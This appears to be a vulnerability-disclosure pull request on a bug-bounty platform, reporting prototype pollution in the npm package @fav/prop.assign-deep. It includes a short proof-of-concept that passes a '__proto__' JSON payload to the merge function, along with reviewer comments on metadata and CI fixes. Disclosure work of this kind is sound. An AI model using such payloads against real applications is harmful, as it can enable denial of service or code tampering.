### PR TITLE
Prototype Pollution in @fav/prop.assign-deep

### PR DESCRIPTION
**Pull request by Asjidkalam**
## ✍️ Description

`@fav/prop.assign-deep` is vulnerable to Prototype Pollution.

Affected versions of this package are vulnerable to Prototype Pollution. Affected versions of this package are vulnerable to Prototype Pollution via merging functions. These functions allow a malicious user to modify the prototype of Object via `prototype` or `constructor`, causing the addition or modification of an existing property that will exist on all objects.

## 🕵️‍♂️ Proof of Concept

Install the package(`npm i @fav/prop.assign-deep`), run the below code:

```javascript
// poc.js
var assignDeep = require('@fav/prop.assign-deep');
console.log("Before", {}.status)
assignDeep({}, JSON.parse('{ "__proto__" : { "status" : "polluted!" } }'));
console.log("After:", status);
```
Outputs `polluted!`.

## 💥 Impact
It leads to either denial of service by triggering JavaScript exceptions or tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

## ✅ Checklist
- [x] _Created and populated the `README.md` and `vulnerability.json` files_
- [x] _Provided the repository URL and any applicable [permalinks]([https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files](https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files))_
- [x] _Defined all the applicable weaknesses ([CWEs]([https://cwe.mitre.org/](https://cwe.mitre.org/)))_
- [x] _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_
- [x] _Checked that the vulnerability affects the latest version of the package released_
- [x] _Checked that a fix does not currently exist that remediates this vulnerability_
- [x] _Complied with all applicable laws_

### CODE REVIEW

**Comment by adam-nygate** [comment]
@Asjidkalam hey! We notice a bug in one of our automated tests, so we're just working on a fix. Will post an update here soon :)

File: bounties/npm/@fav/prop.assign-deep/1/vulnerability.json [hunk 1]
```diff
@@ -0,0 +1,56 @@
+{
+  "PackageVulnerabilityID": "2",
```
Comment (JamieSlome) [inline bounties/npm/@fav/prop.assign-deep/1/vulnerability.json:2]: Spotted the culprit - change this to `1`.

Comment (Asjidkalam) [reply bounties/npm/@fav/prop.assign-deep/1/vulnerability.json]: Corrected!
Thanks @JamieSlome

Comment (Asjidkalam) [reply bounties/npm/@fav/prop.assign-deep/1/vulnerability.json]: @JamieSlome Still the tests are failing.

Comment (adam-nygate) [reply bounties/npm/@fav/prop.assign-deep/1/vulnerability.json]: Yep, that fixed one issue. Just fixing a bug on our side for the CVSS checks.

**Comment by JamieSlome** [comment]
Can you trigger the run again by adding a space to your `README.md`?

**Comment by JamieSlome** [comment]
Screenshot 2021-02-12 at 15 51 06

**Pull request merged**